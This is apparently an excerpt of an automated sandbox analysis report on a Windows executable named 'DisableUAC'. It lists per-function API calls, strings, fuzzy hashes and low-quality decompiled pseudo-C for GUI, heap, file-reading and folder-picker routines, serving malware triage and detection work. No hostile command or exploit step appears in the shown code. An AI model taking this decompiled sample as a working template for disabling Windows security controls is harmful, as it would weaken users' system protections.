Download Yara Rule

APIs

HeapCreate.KERNEL32 ref: 000000014001050E

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: ab2898fdd98adbadaf2f6490bddb05fb728a15c2bab52293f7c69f690232f00c
Instruction ID: 9e95885741ccd6b86c35a59d8dfac36af32afa7d534c6f901aea5a77439a374e
Opcode Fuzzy Hash: ab2898fdd98adbadaf2f6490bddb05fb728a15c2bab52293f7c69f690232f00c
Instruction Fuzzy Hash: 24C02B747127A082E74923225C037493154A30D3C0FD01016E60502B30CF3E81924B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000BE90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000BEA0

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: ExceptionHandlerRemoveVectored
String ID:
API String ID: 1340492425-0
Opcode ID: ed20ff5cc71e9d51a656e3cf40904bf5fd027592e81c6eb8c253aa08652b6c47
Instruction ID: a5c054d6d4f9f82b5157fb02c141b866ac777b4ff90b94006deb83b68245e303
Opcode Fuzzy Hash: ed20ff5cc71e9d51a656e3cf40904bf5fd027592e81c6eb8c253aa08652b6c47
Instruction Fuzzy Hash: 9FC04C78A12A50B1FB0ADB43FCD57A43360BB5C7B5F940405EB051B6718B7D40954701

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000A6F4 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32 ref: 000000014000A705

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 5673188220bd8159402e2654bc76900171083c6152e98b6fb37ae8fce947d39a
Instruction ID: 1b94e5348b9a93006091e85a50b0d37e95e7fab431b6f21d7350901c5b63cca9
Opcode Fuzzy Hash: 5673188220bd8159402e2654bc76900171083c6152e98b6fb37ae8fce947d39a
Instruction Fuzzy Hash: 87C00236635940C1D6459B15E4D53597720F7C8796FD06005F74B46578CF7DC195CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140014840 Relevance: 1.3, APIs: 1, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

HeapReAlloc.KERNEL32 ref: 00000001400148A7

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: be150342337c4f7961325b52d856ab318d0b9c0ebe3757d3569d425de5dbb277
Instruction ID: 38bafff496eff2b4682dd472dcefae42e395f04a267573c87d5b07e24467fec9
Opcode Fuzzy Hash: be150342337c4f7961325b52d856ab318d0b9c0ebe3757d3569d425de5dbb277
Instruction Fuzzy Hash: D311B375A09A5486EB65CF1AF89136577B0FB8C7C8F40012AEB8D87B34DB3DC1118B04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000000014000E9BC Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 91keyboardwindowstringCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 000000014000E9C9
GetKeyState.USER32 ref: 000000014000E9E0
GetKeyState.USER32 ref: 000000014000E9EF
GetKeyState.USER32 ref: 000000014000E9FE
GetKeyState.USER32 ref: 000000014000EA0D
GetClassNameA.USER32 ref: 000000014000EA25
strncmp.MSVCRT(?,?,00000000,000000014000DE83), ref: 000000014000EA3D
SendMessageA.USER32 ref: 000000014000EA54
GetKeyState.USER32 ref: 000000014000EA6F
GetKeyState.USER32 ref: 000000014000EA7E
GetKeyState.USER32 ref: 000000014000EA8D
GetPropA.USER32 ref: 000000014000EAB3
GetPropA.USER32 ref: 000000014000EAC8
GetWindowThreadProcessId.USER32 ref: 000000014000EADE
GetCurrentProcessId.KERNEL32 ref: 000000014000EAE8

Strings

PB_WindowID, xrefs: 000000014000EABE
PB_Hotkey, xrefs: 000000014000EAA9
Rich, xrefs: 000000014000EA2B

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: State$ProcessProp$ClassCurrentFocusMessageNameSendThreadWindowstrncmp
String ID: PB_Hotkey$PB_WindowID$Rich
API String ID: 1107629356-1791564756
Opcode ID: c658e774576af7adb31cf8b9b7201443961cfb9e3b2625db77c649c04e9d8c10
Instruction ID: 7724d948ead176510f6aac5edf175da40bd5176146ad2ee81af12d8736b47bd6
Opcode Fuzzy Hash: c658e774576af7adb31cf8b9b7201443961cfb9e3b2625db77c649c04e9d8c10
Instruction Fuzzy Hash: 1A311C71300A8582FE569F13B5543E527A2BB4EBC5F085424FB0A1B6B6DF7BD445C301

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000DFD0 Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 361
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 29%

			E0000000114000DFD0(void* __edx, signed int __ebp, long long __rbx, void* __rcx, long long __rsi, unsigned long long __r8, long long __r9) {
				void* __rdi;
				void* __r12;
				void* _t40;
				struct HWND__* _t43;
				signed int _t48;
				void* _t65;
				void* _t87;
				void* _t133;
				unsigned long long _t154;
				void* _t164;
				void* _t165;
				intOrPtr* _t170;
				void* _t171;
				intOrPtr* _t174;
				long long* _t175;
				long long* _t177;
				intOrPtr _t184;
				intOrPtr _t187;
				void* _t199;
				void* _t220;
				intOrPtr* _t221;
				signed long long _t225;
				signed long long _t226;
				long long _t228;
				unsigned long long _t229;
				intOrPtr* _t234;
				void* _t235;
				void* _t257;
				struct HWND__* _t264;
				long long _t266;
				void* _t269;
				struct HWND__* _t271;
				void* _t272;
				struct HWND__* _t274;
				intOrPtr* _t276;

				_t181 = __rbx;
				_t174 = _t234;
				 *((long long*)(_t174 + 8)) = __rbx;
				 *((long long*)(_t174 + 0x10)) = _t228;
				 *((long long*)(_t174 + 0x18)) = __rsi;
				 *((long long*)(_t174 + 0x20)) = __r9;
				_t235 = _t234 - 0x40;
				_t272 = __rcx;
				_t184 =  *0x4001d890; // 0x21a3180
				_t229 = __r8;
				E0000000114001374C(_t40, _t184);
				if (__rcx == 0) goto 0x4000e063;
				GetPropA(_t274);
				if (_t174 != 0) goto 0x4000e03f;
				_t43 = GetParent(_t271);
				_t276 = _t174;
				if (_t174 != 0) goto 0x4000e016;
				_t266 =  *((intOrPtr*)(_t235 + 0x88));
				if (_t276 == 0) goto 0x4000e063;
				_t187 =  *0x4001d880; // 0x21a30b0
				_t225 = _t174 - 1;
				E00000001140013664(_t43, _t187, _t225);
				_t221 = _t174;
				goto 0x4000e067;
				_t226 = _t225 | 0xffffffff;
				if (_t221 == 0) goto 0x4000e112;
				_t175 =  *((intOrPtr*)(_t221 + 0x18));
				if (_t175 == 0) goto 0x4000e112;
				 *_t175();
				if (_t175 != 0xe0e0e0e1) goto 0x4000e4f5;
				r8d = 0x111;
				_t133 = __edx - r8d;
				if (_t133 > 0) goto 0x4000e3f1;
				if (_t133 == 0) goto 0x4000e358;
				if (_t133 == 0) goto 0x4000e331;
				if (_t133 == 0) goto 0x4000e2c0;
				if (_t133 == 0) goto 0x4000e256;
				if (_t133 == 0) goto 0x4000e23a;
				if (_t133 == 0) goto 0x4000e1d7;
				if (_t133 == 0) goto 0x4000e1ac;
				if (_t133 == 0) goto 0x4000e144;
				_t87 = __edx - 0xffffffffffffffb8;
				if (_t133 == 0) goto 0x4000e125;
				if (_t87 != 0x34) goto 0x4000e4f2;
				RemovePropA(_t264);
				goto 0x4000e2b5;
				if ( *0xFFFFFFFFD0D0D0F1 == 0) goto 0x4000e09a;
				goto 0x4000e07f;
				r8d = 0x4e;
				 *((long long*)(_t235 + 0x20)) = _t266;
				E0000000114000DF04( *0xFFFFFFFFD0D0D0F1, __rbx,  *_t266, __rcx, _t226, _t229, _t229, _t257, _t220);
				goto 0x4000e4ef;
				if (_t221 == 0) goto 0x4000e4f2;
				if ( *(_t221 + 0x40) == 0) goto 0x4000e15d;
				_t48 =  *(_t221 + 0x40) & 0x0000ffff;
				 *(_t266 + 0x18) = _t48;
				goto 0x4000e179;
				__imp__GetWindowLongPtrA();
				if (_t48 >= 0) goto 0x4000e179;
				 *(_t266 + 0x18) = 1;
				if ( *(_t221 + 0x42) == 0) goto 0x4000e187;
				 *(_t266 + 0x1c) =  *(_t221 + 0x42) & 0x0000ffff;
				if ( *(_t221 + 0x44) == 0) goto 0x4000e195;
				 *(_t266 + 0x20) =  *(_t221 + 0x44) & 0x0000ffff;
				if ( *(_t221 + 0x46) == 0) goto 0x4000e350;
				 *(_t266 + 0x24) =  *(_t221 + 0x46) & 0x0000ffff;
				goto 0x4000e350;
				if (_t221 == 0) goto 0x4000e4f2;
				if ( *((intOrPtr*)(_t221 + 0x30)) != _t272) goto 0x4000e4f2;
				r8d = 0;
				EnumChildWindows(??, ??, ??);
				goto 0x4000e4f2;
				if (_t221 == 0) goto 0x4000e223;
				if ( *((intOrPtr*)(_t221 + 0x28)) == _t272) goto 0x4000e20a;
				GetClientRect(??, ??);
				FillRect(??, ??, ??);
				r12d = 1;
				goto 0x4000e223;
				if ( *_t221 != _t272) goto 0x4000e223;
				_t177 =  *((intOrPtr*)(_t221 + 0x38));
				if (_t177 == 0) goto 0x4000e223;
				 *_t177();
				r9d = 0;
				E00000001140011A64(_t177);
				goto 0x4000e4f2;
				if (_t221 == 0) goto 0x4000e350;
				if (_t272 !=  *_t221) goto 0x4000e350;
				goto 0x4000e340;
				if (__ebp == 0) goto 0x4000e280;
				GetPropA(??, ??);
				if (_t177 == 0) goto 0x4000e279;
				SetFocus(??);
				goto 0x4000e2a8;
				GetFocus();
				SetPropA(??, ??, ??);
				_t199 = _t272;
				E0000000114000E968(0, _t199);
				r9d = 0;
				E00000001140011A64(_t177);
				r12d = 1;
				goto 0x4000e4f2;
				if (_t276 != _t272) goto 0x4000e2b5;
				if (_t226 == 0xffffffff) goto 0x4000e4f2;
				_t154 = _t229;
				if (_t154 == 0) goto 0x4000e305;
				r9d = 0;
				if (_t154 == 0) goto 0x4000e2f4;
				_t231 = _t229;
				if (_t154 != 0) goto 0x4000e327;
				 *(_t221 + 0x48) = 1;
				goto 0x4000e31a;
				 *(_t221 + 0x48) = 1;
				goto 0x4000e4e8;
				if ( *(_t221 + 0x48) == 0x3333) goto 0x4000e31f;
				 *(_t221 + 0x48) = 0x3333;
				r9d = 0;
				E00000001140011A64(_t177);
				r9d = 0;
				goto 0x4000e4e8;
				if (_t221 == 0) goto 0x4000e350;
				if (_t272 !=  *_t221) goto 0x4000e350;
				r9d = 0;
				E00000001140011A64(_t177);
				goto 0x4000e4f2;
				 *((long long*)(_t235 + 0x20)) = _t266;
				_t65 = E0000000114000DF04(_t177, _t181, _t266, _t272, _t226, _t229, _t229);
				if (_t177 != _t199) goto 0x4000e4ed;
				if (_t266 == 0) goto 0x4000e3a7;
				__imp__GetWindowLongPtrA();
				if (_t177 == 0xffffd8f0) goto 0x4000e3e1;
				r9d = __ebp & 0x0000ffff;
				goto 0x4000e4e8;
				if (_t65 != 0) goto 0x4000e3bb;
				goto 0x4000e3e4;
				if (__ebp == 0xfa01) goto 0x4000e3d4;
				if (__ebp != 0xfa02) goto 0x4000e3de;
				E0000000114000E7FC(1, _t181, _t221, _t226, _t199);
				goto 0x4000e4ed;
				r9d = 0;
				goto 0x4000e4e8;
				_t164 = _t87 - 0x202;
				if (_t164 > 0) goto 0x4000e457;
				if (_t164 == 0) goto 0x4000e44d;
				_t165 = _t87 - 0x113;
				if (_t165 == 0) goto 0x4000e434;
				if (_t165 <= 0) goto 0x4000e4f2;
				if (_t87 - 0x115 <= 0) goto 0x4000e473;
				if (_t87 - 0x132 <= 0) goto 0x4000e4f2;
				if (_t87 - 0x135 <= 0) goto 0x4000e473;
				if (_t87 == 0x138) goto 0x4000e473;
				goto 0x4000e4f2;
				_t170 = _t221;
				if (_t170 == 0) goto 0x4000e4f2;
				r9d = 0;
				goto 0x4000e4e5;
				goto 0x4000e4e0;
				if (_t170 == 0) goto 0x4000e4db;
				if (_t170 == 0) goto 0x4000e4d4;
				if (_t170 == 0) goto 0x4000e47e;
				_t171 = _t87 - 0xffffffffffffd331 - 0x26b;
				if (_t171 != 0) goto 0x4000e4f2;
				r8d = _t87;
				goto 0x4000e12f;
				if (_t171 == 0) goto 0x4000e4ae;
				if (_t171 == 0) goto 0x4000e4a6;
				_t269 = _t266 - 0x1fe;
				if (_t171 == 0) goto 0x4000e49e;
				if (_t269 != 2) goto 0x4000e4c1;
				r9d = _t269 + 1;
				goto 0x4000e4b1;
				r9d = 1;
				goto 0x4000e4b1;
				r9d = 2;
				goto 0x4000e4b1;
				r9d = 0;
				E00000001140011A64(_t231 >> 0x10 >> 0x10);
				r9d = 0;
				r8d = 0;
				PostMessageA(??, ??, ??, ??);
				goto 0x4000e4ed;
				goto 0x4000e4e0;
				r9d = 0;
				E00000001140011A64(_t231 >> 0x10 >> 0x10);
				return 0;
			}

0x14000dfd0
0x14000dfd0
0x14000dfd3
0x14000dfd7
0x14000dfdb
0x14000dfdf
0x14000dfec
0x14000dff0
0x14000dff3
0x14000dfff
0x14000e006
0x14000e014
0x14000e020
0x14000e02c
0x14000e031
0x14000e037
0x14000e03d
0x14000e03f
0x14000e04a
0x14000e04c
0x14000e053
0x14000e059
0x14000e05e
0x14000e061
0x14000e063
0x14000e06c
0x14000e072
0x14000e079
0x14000e08a
0x14000e092
0x14000e09a
0x14000e0a7
0x14000e0aa
0x14000e0b0
0x14000e0b9
0x14000e0c2
0x14000e0ca
0x14000e0d3
0x14000e0dc
0x14000e0e4
0x14000e0ed
0x14000e0ef
0x14000e0f2
0x14000e0f7
0x14000e107
0x14000e10d
0x14000e11a
0x14000e120
0x14000e129
0x14000e135
0x14000e13a
0x14000e13f
0x14000e147
0x14000e151
0x14000e153
0x14000e157
0x14000e15b
0x14000e165
0x14000e16f
0x14000e171
0x14000e17d
0x14000e183
0x14000e18b
0x14000e191
0x14000e199
0x14000e1a3
0x14000e1a7
0x14000e1af
0x14000e1b9
0x14000e1c6
0x14000e1cc
0x14000e1d2
0x14000e1da
0x14000e1e0
0x14000e1ea
0x14000e1fc
0x14000e202
0x14000e208
0x14000e20d
0x14000e20f
0x14000e216
0x14000e21e
0x14000e223
0x14000e230
0x14000e235
0x14000e23d
0x14000e246
0x14000e251
0x14000e259
0x14000e265
0x14000e26e
0x14000e273
0x14000e27e
0x14000e280
0x14000e293
0x14000e29b
0x14000e29e
0x14000e2a8
0x14000e2b0
0x14000e2b5
0x14000e2bb
0x14000e2c3
0x14000e2c9
0x14000e2cf
0x14000e2d2
0x14000e2d4
0x14000e2df
0x14000e2e1
0x14000e2e4
0x14000e2e6
0x14000e2f2
0x14000e2f4
0x14000e300
0x14000e308
0x14000e30a
0x14000e30d
0x14000e31a
0x14000e31f
0x14000e32c
0x14000e334
0x14000e339
0x14000e346
0x14000e349
0x14000e353
0x14000e361
0x14000e366
0x14000e36e
0x14000e379
0x14000e381
0x14000e390
0x14000e39e
0x14000e3a2
0x14000e3b1
0x14000e3b9
0x14000e3c3
0x14000e3cd
0x14000e3d4
0x14000e3d9
0x14000e3e9
0x14000e3ec
0x14000e3f6
0x14000e3f8
0x14000e3fa
0x14000e401
0x14000e403
0x14000e405
0x14000e411
0x14000e419
0x14000e425
0x14000e42d
0x14000e42f
0x14000e434
0x14000e437
0x14000e43d
0x14000e448
0x14000e452
0x14000e45e
0x14000e463
0x14000e46a
0x14000e46c
0x14000e471
0x14000e473
0x14000e479
0x14000e485
0x14000e48b
0x14000e48d
0x14000e490
0x14000e496
0x14000e498
0x14000e49c
0x14000e49e
0x14000e4a4
0x14000e4a6
0x14000e4ac
0x14000e4ae
0x14000e4bc
0x14000e4c1
0x14000e4c4
0x14000e4cc
0x14000e4d2
0x14000e4d9
0x14000e4e0
0x14000e4e8
0x14000e512

APIs

GetPropA.USER32 ref: 000000014000E020
GetParent.USER32 ref: 000000014000E031
RemovePropA.USER32 ref: 000000014000E107
GetWindowLongPtrA.USER32 ref: 000000014000E165
EnumChildWindows.USER32 ref: 000000014000E1CC
GetClientRect.USER32 ref: 000000014000E1EA
FillRect.USER32 ref: 000000014000E1FC
GetPropA.USER32 ref: 000000014000E265
SetFocus.USER32 ref: 000000014000E273
GetFocus.USER32 ref: 000000014000E280
SetPropA.USER32 ref: 000000014000E293
GetWindowLongPtrA.USER32 ref: 000000014000E381

Strings

PB_WindowID, xrefs: 000000014000E016
4, xrefs: 000000014000E0F4
PB_Focus, xrefs: 000000014000E0FD, 000000014000E25B, 000000014000E286

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Prop$FocusLongRectWindow$ChildClientEnumFillParentRemoveWindows
String ID: 4$PB_Focus$PB_WindowID
API String ID: 2861324861-2151131344
Opcode ID: 89a7c194f17e8bdd23c3c6aaa05f2ed85a4e2a0b1d101c1958ec7f0feb738120
Instruction ID: 6de9619fb0b52541efe0315362492a041abf155df2d960520a51b580895bae82
Opcode Fuzzy Hash: 89a7c194f17e8bdd23c3c6aaa05f2ed85a4e2a0b1d101c1958ec7f0feb738120
Instruction Fuzzy Hash: 2ED1D1B17056D082FBBBDA27B5587E92691F78CBC0F484126BF1627BF0DE798A419301

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400127C0 Relevance: 9.2, APIs: 6, Instructions: 159memoryfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 000000014001280D
HeapAlloc.KERNEL32 ref: 0000000140012831
SetFilePointer.KERNEL32 ref: 000000014001286D
ReadFile.KERNEL32 ref: 00000001400128B7
HeapFree.KERNEL32 ref: 0000000140012A05
CloseHandle.KERNEL32 ref: 0000000140012A1B

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: File$Heap$AllocCloseCreateFreeHandlePointerRead
String ID:
API String ID: 2762812021-0
Opcode ID: 44abe5d1143dc4e399ebf1f55dad1410e8667866860b9da76443d0644e293a17
Instruction ID: 4f2d08a4ba5d3e4c20cc65fd19fcceab3a105356403783d96d8f2d628f8b47a1
Opcode Fuzzy Hash: 44abe5d1143dc4e399ebf1f55dad1410e8667866860b9da76443d0644e293a17
Instruction Fuzzy Hash: 975159323145E087E765CB27A8687AA77A0F38D3A1F414215EFA907BD4DB3EC509CB10

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000E7FC Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 94stringwindowCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 000000014000E81A
GetFocus.USER32 ref: 000000014000E823
IsChild.USER32 ref: 000000014000E83F
GetClassNameA.USER32 ref: 000000014000E86A
strcmp.MSVCRT ref: 000000014000E87B
strcmp.MSVCRT ref: 000000014000E89E
GetWindowLongPtrA.USER32 ref: 000000014000E8AD
GetParent.USER32 ref: 000000014000E8DE
EnumChildWindows.USER32 ref: 000000014000E90A
SetFocus.USER32 ref: 000000014000E91F
EnumChildWindows.USER32 ref: 000000014000E92E
EnumChildWindows.USER32 ref: 000000014000E948

Strings

SysIPAddress32, xrefs: 000000014000E8BD
ComboBoxEx32, xrefs: 000000014000E893
MDI_ChildClass, xrefs: 000000014000E870

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Child$EnumWindows$FocusWindowstrcmp$ActiveClassLongNameParent
String ID: ComboBoxEx32$MDI_ChildClass$SysIPAddress32
API String ID: 50363231-1864405207
Opcode ID: fdda7cfb3f5f677efe412c7abb83445a5b0b94275ae6b0296e35974c7f03ff13
Instruction ID: fe306914297eff0a2336e7729586e1d6bb25cf2a6c19b0494e8990a5d249f008
Opcode Fuzzy Hash: fdda7cfb3f5f677efe412c7abb83445a5b0b94275ae6b0296e35974c7f03ff13
Instruction Fuzzy Hash: BD4119B2700B55C5FB16DB62E8443D823A5B70CBD9F594125EF0A6BAB8DF75C446C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400099D8 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 113
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E000000011400099D8(long long __rax, long long __rbx, long long __rcx, void* __rdx, long long __rdi, long long __rsi) {
				int _t39;
				void* _t45;
				int _t50;
				void* _t51;
				void* _t66;
				long long _t75;
				intOrPtr* _t77;
				int _t88;
				void* _t94;
				void* _t98;
				long long _t100;
				intOrPtr* _t104;
				struct HINSTANCE__* _t106;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t112;
				CHAR* _t114;
				int _t117;
				int _t119;
				void* _t123;
				long long* _t124;

				_t100 = __rdi;
				_t94 = __rdx;
				_t78 = __rbx;
				_t75 = __rax;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = __rsi;
				 *((long long*)(_t109 + 0x18)) = __rdi;
				_t107 = _t109 - 0x70;
				_t110 = _t109 - 0x170;
				r15d = 0;
				r13d = r8d;
				_t66 =  *0x4001cd00 - r15d; // 0x0
				_t103 = __rcx;
				if (_t66 != 0) goto 0x40009a23;
				 *0x4001cd00 = 1;
				__imp__CoInitialize();
				_t6 = _t94 + 0x40; // 0x40
				r8d = _t6;
				memset(_t123, _t119, _t117);
				LoadLibraryA(_t114);
				if (__rax == 0) goto 0x40009b64;
				GetProcAddress(_t106);
				_t124 = __rax;
				GetProcAddress(??, ??);
				_t7 = _t100 - 1; // 0x103
				r8d = _t7;
				_t98 =  !=  ? __rdx : 0x400196e6;
				 *((long long*)(_t107 + 0xb8)) = __rax;
				strncpy(??, ??, ??);
				r14d = 0;
				 *((intOrPtr*)(_t107 + 0x63)) = r14b;
				_t39 = strlen(??);
				if (_t39 - 3 <= 0) goto 0x40009ac5;
				_t88 = _t39;
				_t41 =  ==  ? r14d :  *(_t110 + _t88 + 0x5f) & 0x000000ff;
				 *(_t110 + _t88 + 0x5f) =  ==  ? r14d :  *(_t110 + _t88 + 0x5f) & 0x000000ff;
				 *((long long*)(_t110 + 0x38)) = __rcx;
				E00000001140009D3C(__rax, __rbx);
				 *((long long*)(_t110 + 0x20)) = _t75;
				 *((intOrPtr*)(_t110 + 0x40)) = 0x50;
				 *((long long*)(_t110 + 0x48)) = 0x14000997c;
				_t77 = _t110 + 0x60;
				 *((long long*)(_t110 + 0x50)) = _t77;
				E00000001140009C40(1, _t78, _t103, _t112);
				 *_t124();
				_t45 = E00000001140009C40(0, _t78, _t103, _t112);
				r15d = 0;
				if (_t77 == 0) goto 0x40009b57;
				E00000001140014840(_t45, 0x104, r13d);
				_t104 = _t77;
				 *_t77 = r15b;
				 *((intOrPtr*)(_t107 + 0xb8))();
				__imp__CoTaskMemFree();
				strlen(??);
				if ( *((char*)(_t77 + _t104 - 1)) == 0x5c) goto 0x40009b57;
				 *((short*)(_t77 + _t104)) = 0x5c;
				_t50 = FreeLibrary(??);
				if (r15d + 1 != 0) goto 0x40009b71;
				_t51 = E00000001140014840(_t50, 0x104, r13d);
				 *_t77 = r15b;
				return E000000011400149E0(_t51, 0x104 - r15d + 1);
			}

0x1400099d8
0x1400099d8
0x1400099d8
0x1400099d8
0x1400099d8
0x1400099dd
0x1400099e2
0x1400099f0
0x1400099f5
0x1400099fc
0x1400099ff
0x140009a05
0x140009a0c
0x140009a0f
0x140009a13
0x140009a1d
0x140009a2a
0x140009a2a
0x140009a2e
0x140009a3d
0x140009a4e
0x140009a5e
0x140009a6e
0x140009a71
0x140009a81
0x140009a81
0x140009a8a
0x140009a8e
0x140009a95
0x140009a9f
0x140009aa2
0x140009aa6
0x140009aae
0x140009ab0
0x140009abd
0x140009ac1
0x140009ac5
0x140009aca
0x140009ad4
0x140009ae0
0x140009ae8
0x140009aed
0x140009af2
0x140009af7
0x140009b01
0x140009b09
0x140009b0e
0x140009b14
0x140009b1b
0x140009b26
0x140009b29
0x140009b2c
0x140009b35
0x140009b3e
0x140009b4d
0x140009b4f
0x140009b5a
0x140009b62
0x140009b69
0x140009b6e
0x140009b9a

APIs

CoInitialize.OLE32 ref: 0000000140009A1D
memset.MSVCRT ref: 0000000140009A2E
LoadLibraryA.KERNEL32 ref: 0000000140009A3D
GetProcAddress.KERNEL32 ref: 0000000140009A5E
GetProcAddress.KERNEL32 ref: 0000000140009A71
strncpy.MSVCRT ref: 0000000140009A95
strlen.MSVCRT ref: 0000000140009AA6
CoTaskMemFree.OLE32 ref: 0000000140009B35
strlen.MSVCRT ref: 0000000140009B3E
FreeLibrary.KERNEL32 ref: 0000000140009B5A

Strings

SHELL32.DLL, xrefs: 0000000140009A33
SHGetPathFromIDList, xrefs: 0000000140009A64
SHBrowseForFolder, xrefs: 0000000140009A54
P, xrefs: 0000000140009AE0
\, xrefs: 0000000140009AB8

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
